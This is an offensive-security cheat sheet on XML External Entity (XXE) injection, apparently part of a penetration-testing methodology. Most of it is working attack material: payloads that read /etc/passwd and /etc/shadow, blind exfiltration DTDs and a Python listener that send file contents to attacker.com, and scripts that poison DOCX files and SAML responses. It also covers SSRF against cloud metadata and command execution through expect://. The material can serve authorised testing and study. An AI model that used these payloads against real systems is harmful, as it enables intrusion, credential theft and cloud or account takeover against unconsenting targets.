XXE
XML External Entity injection. User-supplied XML is parsed with external entities enabled. Read files, SSRF, sometimes RCE.
T=https://target.com
i. Where it lives
XML parsers are everywhere, often hidden:
Obvious:
- SOAP endpoints
- REST APIs accepting Content-Type: application/xml or text/xml
- RSS / Atom feed readers
- WebDAV endpoints
- XML-RPC interfaces (often at /xmlrpc.php)
Hidden inside other formats (every modern Office doc is a zip of XML):
- DOCX, XLSX, PPTX uploads - content.xml, word/document.xml
- SVG uploads - entire format is XML
- PDF uploads (some processors parse embedded XML metadata)
- XMP metadata in images
- ICS calendar uploads
- KML / KMZ (Google Earth) uploads
- OOXML in older Office processors
Inside auth flows:
- SAML assertions (signed XML)
- WS-Security tokens
- XML-based OAuth implementations
Inside DBs and APIs:
- GraphQL with XML response support enabled
- BaseX, eXist-db, MarkLogic DBs over HTTP
Signal that XML is being parsed:
- App accepts XML-shaped bodies and returns parsed content
- Filename ends in .xml, .svg, .docx, .xlsx
- Content-Type: application/xml in request or response
- Error messages mention SAXParseException, XMLParser, lxml
ii. Quick detection
Send a request with a basic external entity probe. The classic file-read test:
<?xml version="1.0"?>
<!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]>
<root>&x;</root>
When /etc/passwd contents appear in the response, you’re in.
When you see no body change, switch to OOB blind XXE - see section iv.
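The probe and the "did it work" check can be scripted. This is a minimal sketch, not a full scanner: build_probe, looks_like_passwd and send_probe are hypothetical helper names, and the endpoint is assumed to accept a raw XML POST body.

```python
import re
import urllib.error
import urllib.request

# Same payload as above, with the file path as a parameter.
PROBE_TEMPLATE = (
    '<?xml version="1.0"?>\n'
    '<!DOCTYPE foo [<!ENTITY x SYSTEM "file://{path}">]>\n'
    '<root>&x;</root>'
)

# Heuristic: a passwd entry looks like name:pw:uid:gid:gecos:home:shell
PASSWD_LINE = re.compile(
    r"^[^:\s]+:[^:\n]*:\d+:\d+:[^:\n]*:[^:\n]*:[^:\s]*$", re.MULTILINE
)


def build_probe(path="/etc/passwd"):
    """Return the file-read probe for an absolute path."""
    return PROBE_TEMPLATE.format(path=path)


def looks_like_passwd(body):
    """True when the response body contains at least one passwd-shaped line."""
    return PASSWD_LINE.search(body) is not None


def send_probe(url, path="/etc/passwd"):
    """POST the probe and return the response body (error bodies included)."""
    req = urllib.request.Request(
        url,
        data=build_probe(path).encode("utf-8"),
        headers={"Content-Type": "application/xml"},
        method="POST",
    )
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as err:
        # Parser errors often come back as 4xx/5xx and may still leak the file.
        return err.read().decode("utf-8", errors="replace")
```

Usage: looks_like_passwd(send_probe("https://target.com/api/users")) returning True means the entity was expanded in-band. The URL path here is only an illustration.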
iii. Burp + tooling
Burp Suite Professional’s scanner includes active XXE checks. For manual testing in Burp:
- Send request to Repeater
- Drop in a probe payload from PayloadsAllTheThings
- Watch the response
XXEinjector for automated extraction:
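ruby XXEinjector.rb --host=YOUR_IP --httpport=8000 --path=/etc --file=request.txt
## --host is your own reachable address (XXEinjector runs its own listener)
## --path is the file or directory to retrieve
## request.txt is the raw HTTP request; mark the injection point with XXEINJECT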
oxml_xxe for crafting XXE payloads inside DOCX/XLSX/PPTX:
git clone https://github.com/BuffaloWill/oxml_xxe
ruby ./oxml_xxe.rb
## Loads in browser, lets you build a malicious office doc and download
dotdotpwn for generating file path patterns to try in the SYSTEM identifier (it has no XXE module, so print the patterns with the stdout module):
dotdotpwn -m stdout -o unix -d 6 -f /etc/passwd
iv. Blind XXE via OAST
Many targets parse the XML but never reflect entity values in the response. Exfiltrate out-of-band (OOB) with a parameter entity that pulls a DTD from your server:
<?xml version="1.0"?>
<!DOCTYPE foo [
<!ENTITY % ext SYSTEM "http://attacker.com/x.dtd">
%ext;
]>
<root>test</root>
Your server hosts x.dtd:
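<!ENTITY % data SYSTEM "file:///etc/passwd">
<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?x=%data;'>">
%param1;
%exfil;
The target fetches your DTD, reads /etc/passwd into %data;, and %exfil; then requests your server with the file contents in the query string. exfil is declared as a parameter entity so that it fires from inside the DTD; a general entity would do nothing unless the document body also referenced &exfil;. Multi-line files often break the URL, so confirm with a single-line file such as /etc/hostname first.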
interactsh / Burp Collaborator as the listener:
interactsh-client
## Or use Burp's built-in Collaborator
Some parser configurations (older libxml2 builds, for example) still fetch an external DTD even when entity values never reach the response, so try the OOB probe even after the in-band test shows nothing.
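interactsh and Collaborator log callbacks, but the DTD itself has to be hosted somewhere. The sketch below is one way to do both from a single process, assuming Python's standard http.server is acceptable as a listener. build_dtd, extract_leak, DtdHandler and serve are hypothetical names, the x query parameter is an arbitrary choice, and the DTD uses the parameter-entity form so the callback fires without a reference in the document body.

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlsplit


def build_dtd(callback_base, target_file="/etc/hostname"):
    """Return the external DTD that reads target_file and calls back with it."""
    return (
        f'<!ENTITY % data SYSTEM "file://{target_file}">\n'
        f'<!ENTITY % param1 "<!ENTITY &#x25; exfil SYSTEM '
        f"'{callback_base}/?x=%data;'>\">\n"
        "%param1;\n"
        "%exfil;\n"
    )


def extract_leak(request_path):
    """Pull the exfiltrated value out of a callback path such as /?x=web01."""
    query = urlsplit(request_path).query
    return parse_qs(query).get("x", [""])[0]


class DtdHandler(BaseHTTPRequestHandler):
    # Assumption: this must be the URL the target can reach you on.
    callback_base = "http://attacker.com"

    def do_GET(self):
        if urlsplit(self.path).path == "/x.dtd":
            body = build_dtd(self.callback_base).encode("utf-8")
            self.send_response(200)
            self.send_header("Content-Type", "application/xml-dtd")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            self.wfile.write(body)
        else:
            # Any other request is treated as the exfil callback.
            print("exfil:", extract_leak(self.path))
            self.send_response(204)
            self.end_headers()


def serve(port=8000):
    """Block and serve x.dtd plus log callbacks until interrupted."""
    HTTPServer(("0.0.0.0", port), DtdHandler).serve_forever()
```

Call serve() on the host that attacker.com resolves to, then send the %ext probe from this section. Leaked values show up on stdout.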
v. PHP filter chain for base64 file read
When the file you want contains bytes that break XML (NUL, control chars, stray < or &), wrap it in a PHP filter first. This works only when the target is PHP and php://filter is accessible:
<!ENTITY x SYSTEM "php://filter/convert.base64-encode/resource=/etc/shadow">
Returns base64 in the response. Decode on your side.
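Decoding can be automated when the base64 comes back embedded in a larger response. A minimal sketch, assuming the leaked value is the longest base64-looking run in the body (decode_leak is a hypothetical helper, and the 16-character minimum is an arbitrary threshold to skip ordinary words):

```python
import base64
import re

# A run of base64 alphabet characters with optional padding.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_leak(body):
    """Decode the longest base64 run found in body, or return None."""
    runs = B64_RUN.findall(body)
    if not runs:
        return None
    longest = max(runs, key=len)
    try:
        return base64.b64decode(longest, validate=True)
    except ValueError:
        # Not valid base64 after all (wrong length or padding).
        return None
```

The result is bytes, not str, because the whole point of the filter is to carry content that is not safe text.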
vi. SVG upload XXE
SVG is XML. Many image-handling pipelines (avatar upload, profile photo) pass SVG through a parser before stripping or converting.
Minimal test SVG:
<?xml version="1.0" standalone="yes"?>
<!DOCTYPE svg [<!ENTITY x SYSTEM "file:///etc/hostname">]>
<svg xmlns="http://www.w3.org/2000/svg">
<text x="0" y="20">&x;</text>
</svg>
Upload, view the rendered image. The hostname appears in the text.
Variant: when ImageMagick (with or without librsvg) rasterizes the uploaded SVG, also test ImageTragick-style payloads against the same upload.
vii. Office document XXE (DOCX, XLSX, PPTX)
These are zip archives containing XML. Inject XXE into one of the inner XML files:
unzip target.docx -d unpacked/
## Edit unpacked/word/document.xml - inject XXE at top
## Repack:
cd unpacked && zip -r ../malicious.docx .
Then upload to the target’s “open document” feature. Common in cv-parser, doc-to-pdf, OCR services.
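The unzip / edit / repack steps can also be done in memory. This sketch assumes the blind (OOB) variant from section iv, because a parameter entity fires without needing a reference inside the document text; for an in-band test you would also have to place an entity reference inside a text run. inject_doctype and poison_docx are hypothetical helpers, and attacker.com is the placeholder host used earlier.

```python
import io
import re
import zipfile

# Blind probe: fetches an external DTD as soon as the DOCTYPE is parsed.
DOCTYPE = (
    '<!DOCTYPE foo [<!ENTITY % ext SYSTEM "http://attacker.com/x.dtd"> %ext;]>'
)


def inject_doctype(xml_text, doctype=DOCTYPE):
    """Insert the DOCTYPE after the XML declaration, or at the top if absent."""
    decl = re.match(r"\s*<\?xml[^>]*\?>", xml_text)
    if decl:
        return xml_text[: decl.end()] + doctype + xml_text[decl.end():]
    return doctype + xml_text


def poison_docx(src_bytes, member="word/document.xml"):
    """Return a copy of the archive with the DOCTYPE injected into member."""
    out = io.BytesIO()
    with zipfile.ZipFile(io.BytesIO(src_bytes)) as zin, zipfile.ZipFile(
        out, "w", zipfile.ZIP_DEFLATED
    ) as zout:
        for item in zin.infolist():
            data = zin.read(item.filename)
            if item.filename == member:
                data = inject_doctype(data.decode("utf-8")).encode("utf-8")
            # Reuse the original entry metadata so names and order are kept.
            zout.writestr(item, data)
    return out.getvalue()
```

Usage: read target.docx as bytes, pass it to poison_docx, and write the result to malicious.docx. For XLSX or PPTX, pass a different member such as xl/workbook.xml.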
viii. SAML XXE
SAML responses are XML. If the SAML library doesn’t disable external entities, you have XXE in an auth flow.
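Test by intercepting a SAML response with Burp + the SAML Raider extension, injecting an external entity into the assertion, and replaying it. The service provider (SP), not the IdP, is what parses the response, and it has to parse the XML before it can verify the signature, so the entity can resolve even though the edit invalidates the signature. If the SP echoes parser errors, makes an OOB request, or accepts the modified assertion, you have XXE.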
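Outside Burp, the same edit can be sketched in a few lines. This assumes the HTTP-POST binding, where the SAMLResponse form field is plain base64 over the XML (URL-decode the form value first; the Redirect binding additionally deflates the message and is not handled here). add_doctype and inject_into_saml are hypothetical helpers.

```python
import base64


def add_doctype(xml, doctype):
    """Place doctype after the XML declaration, or at the very top if absent."""
    if xml.lstrip().startswith("<?xml"):
        end = xml.index("?>") + 2
        return xml[:end] + doctype + xml[end:]
    return doctype + xml


def inject_into_saml(saml_response_b64, doctype):
    """Decode a SAMLResponse value, inject the DOCTYPE, and re-encode it."""
    xml = base64.b64decode(saml_response_b64).decode("utf-8")
    patched = add_doctype(xml, doctype)
    return base64.b64encode(patched.encode("utf-8")).decode("ascii")
```

Pass the blind-probe DOCTYPE from section iv as doctype, URL-encode the returned value, and replay it in place of the original SAMLResponse.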
ix. XXE to SSRF
Any URL handler in an entity becomes SSRF. The payload reads from your URL of choice:
<!ENTITY x SYSTEM "http://169.254.169.254/latest/meta-data/">
Standard SSRF targets apply - see WEB12 SSRF. Cloud metadata endpoints are the highest-value targets (see Cloud Recon section viii for AWS / Azure / GCP IMDS).
Java parsers also support ftp://, jar: (written jar:http://host/file.jar!/entry) and, on older JDKs, gopher:// and netdoc:, which expand the attack surface.
x. XXE to RCE
Direct RCE via XXE is rare and language-specific:
- PHP with the expect:// wrapper enabled (needs the expect extension, rarely installed): <!ENTITY x SYSTEM "expect://id">
- Java with jar: plus crafted JAR fetch (older parsers)
- XSLT injection alongside XXE in some processors
For most cases, XXE → file read of credentials → use creds elsewhere → RCE.
xi. Billion laughs (DoS, mostly informational)
Nested entity expansion exhausts memory (each level references the previous one ten times; true recursion is rejected by the parser):
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
...
<root>&lol9;</root>
DoS-only, mention in report but don’t trigger on production targets.
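The growth is easy to quantify for the report without sending anything. A small sketch of the arithmetic, using the entity naming above where lol is level 1 and each level repeats the previous one ten times (expanded_bytes is a hypothetical helper):

```python
def expanded_bytes(level, fanout=10, base="lol"):
    """Size in bytes of the level-N entity after full expansion.

    Level 1 is the base string itself; every further level multiplies
    the size by fanout.
    """
    return len(base) * fanout ** (level - 1)


# &lol9; with the definitions above: 10**8 copies of "lol"
print(expanded_bytes(9))  # 300000000
```

So a payload of well under 1 KB asks the parser for roughly 300 MB, and one more level brings it to about 3 GB.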
xii. Tricks worth knowing
Try without <?xml prolog
Some parsers tolerate a missing XML declaration, so drop the <?xml ...?> line if a filter appears to key on it. Also try JSON endpoints that fall back to XML parsing on certain content types.
Content-Type confusion
Send XML body to a JSON-accepting endpoint:
curl -X POST "$T/api/users" \
-H 'Content-Type: application/xml' \
-d '<?xml version="1.0"?><!DOCTYPE foo [<!ENTITY x SYSTEM "file:///etc/passwd">]><user><name>&x;</name></user>'
Some frameworks register an XML deserializer alongside the JSON one and pick the parser from the Content-Type header; others sniff the body shape and ignore the header.
XInclude when full XXE is blocked
XInclude is a separate XML feature that allows inclusion of external resources. Sometimes enabled even when DTD parsing is disabled:
<root xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</root>
Don’t forget XSLT
XML processing pipelines sometimes accept XSLT transformations from user input. XSLT abuses include file read, SSRF, and depending on the processor, code execution.
XPath injection is the other XML bug
When user input is concatenated into an XPath query (not in the document but in the query selector), you can extract data similarly to SQLi. Common in LDAP-XPath bridges and XML DBs.
xiii. References
- PortSwigger - XXE - best guided lab
- PayloadsAllTheThings - XXE
- HackTricks - XXE
- oxml_xxe - office doc XXE generator
- SAML Raider - Burp extension for SAML XXE
xiv. Where it leads
- File read → /etc/passwd, /etc/shadow (if readable), SSH keys, app configs, cloud credentials
- SSRF via XXE → cloud metadata → cloud takeover via AWS / Azure / GCP
- Source code read → find more bugs offline (look for hardcoded creds, SQL queries, deserialization sinks)
- SAML XXE → auth bypass / impersonate any user
- PHP expect:// → direct RCE → 04 Initial Access